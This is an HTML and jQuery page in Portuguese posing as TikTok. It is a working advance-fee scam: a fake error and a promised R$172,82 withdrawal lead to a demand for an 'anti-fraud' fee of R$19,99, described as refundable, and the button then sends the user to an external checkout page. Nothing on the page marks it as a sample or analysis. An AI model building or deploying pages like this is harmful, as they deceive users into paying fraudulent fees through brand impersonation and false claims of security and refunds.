<!DOCTYPE html>
<html lang="pt-br">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>TikTok</title>
    <link rel="icon" type="image/png" href="image/icone.png" />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <style>
      .android-style body {
        font-family: "Arial", sans-serif;
        background: linear-gradient(90deg, #00fffb, #ff0048);
        text-align: center;
        padding: 0;
        margin: 0;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        min-height: 100vh;
        position: relative;
        overflow: hidden;
      }

      .android-style .container {
        background: #fff;
        border-radius: 15px;
        box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
        width: 380px;
        overflow: hidden;
        z-index: 1;
        margin-bottom: 150px;
      }

      .android-style .tiktok-logo {
        position: absolute;
        bottom: 20px;
        z-index: 2;
      }

      .android-style .tiktok-logo img {
        width: 200px;
        margin: 100px;
        height: auto;
      }

      .android-style .content {
        margin-top: 2px;
        padding: 5px;
      }

      .android-style .angolano {
        font-size: 0.7em;
      }

      .android-style .cripto {
        font-size: 0.7em;
      }

      .android-style .header {
        background: #000;
        color: #fff;
      }

      .android-style .question {
        background: #e3e2e2;
        margin-bottom: 10px;
        padding: 2px;
        border-radius: 20px;
        font-size: 1em;
      }

      .android-style .btn {
        background: #ff1952;
        border: none;
        border-radius: 5px;
        color: rgb(255, 255, 255);
        padding: 8px 12px;
        margin-top: 5px;
        cursor: pointer;
        font-size: 1em;
      }

      .announcement {
        width: 80px;
        position: absolute;
        top: 8%;
        left: 50%;
        transform: translateX(-50%);
        background: rgba(255, 255, 255, 0.829);
        border-radius: 15px;
        padding: 10px 20px;
        margin-top: -30px;
        z-index: 2;
        color: #000000;
        font-size: 1.2em;
        box-shadow: 0 4px 6px rgba(255, 255, 255, 0.296);
        text-align: center;
      }

      .container {
        background: #fff;
        border-radius: 15px;
        box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
        width: 600px;
        overflow: hidden;
        z-index: 1;
        margin-bottom: 100px;
      }

      .question {
        background: #e3e2e2;
        margin-bottom: 35px;
        padding: 1px;
        border-radius: 60px;
        font-size: 1.5em;
      }

      .header {
        background: #000;
        color: #fff;
        padding: 10px;
      }

      body {
        font-family: "Arial", sans-serif;
        background: linear-gradient(90deg, #00fffb, #ff0048);
        text-align: center;
        padding: 0;
        margin: 0;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        min-height: 100vh;
        position: relative;
        overflow: hidden;
      }

      .content {
        padding: 20px;
      }

      .btn {
        background: #ff1952;
        border: none;
        border-radius: 8px;
        color: rgb(255, 255, 255);
        padding: 15px 30px;
        margin: 10px;
        margin-top: -10%;
        cursor: pointer;
        font-size: 1.3em;
      }

      .btn:hover {
        background: rgb(181, 0, 66);
      }

      .tiktok-logo {
        position: absolute;
        bottom: 20px;
        z-index: 2;
      }

      .tiktok-logo img {
        width: 300px;
        margin: -10px;
        height: auto;
      }

      .cripto {
        color: #737373a3;
      }
    </style>
  </head>
  <body>
    <div class="announcement">
      <img src="image/triangle.svg" alt="" /><strong>Erro 504</strong>
    </div>
    <div class="container">
      <div class="header">
        <h2>Chave pix não cadastrada</h2>
      </div>
      <div class="content">
        <div class="question">
          <p>
            Precisamos saber que você é uma pessoa real e liberar o saque
            (R$172,82) e seu APP com segurança garantida!
          </p>
        </div>
      </div>
      <button class="btn" data-answer="yes" id="prosseguirCadastro">
        <strong>Prosseguir cadastro</strong>
      </button>
      <p>
        <a href="">Políticas de Privacidade</a> |
        <a href="">Termos de Serviço</a> | <a href="">Direitos Autorais</a>
      </p>
      <div class="cripto">
        <p>Ambiente criptografado e 100% seguro.</p>
      </div>
    </div>

    <div class="tiktok-logo">
      <img src="image/tiktok.png" alt="Logo TikTok" />
    </div>
  </body>

  <script>
    $(document).ready(function () {
      var etapaCadastro = 1;

      $("#prosseguirCadastro").click(function () {
        if (etapaCadastro === 1) {
          $(".announcement").remove();
          $(".header h2").text("Sistema Anti-Fraude");
          $(".question p").html(
            "Para a sua segurança, é preciso efetuar um pagamento ANTI-FRAUDE no valor de R$ 19,99. Este custo vai ser 100% reembolsado para você juntamente com seu primeiro saque."
          );
          $(this).text("Finalizar Cadastro");
          etapaCadastro = 2;
        } else if (etapaCadastro === 2) {
          window.location.href =
            "https://checkout.pepper.com.br/?p=117223&o=138281";
        }
      });
      setTimeout(function () {
        $(".announcement").fadeOut("slow");
      }, 2000);

      if (/Android/i.test(navigator.userAgent)) {
        $("body").addClass("android-style");
      }
    });
  </script>
</html>
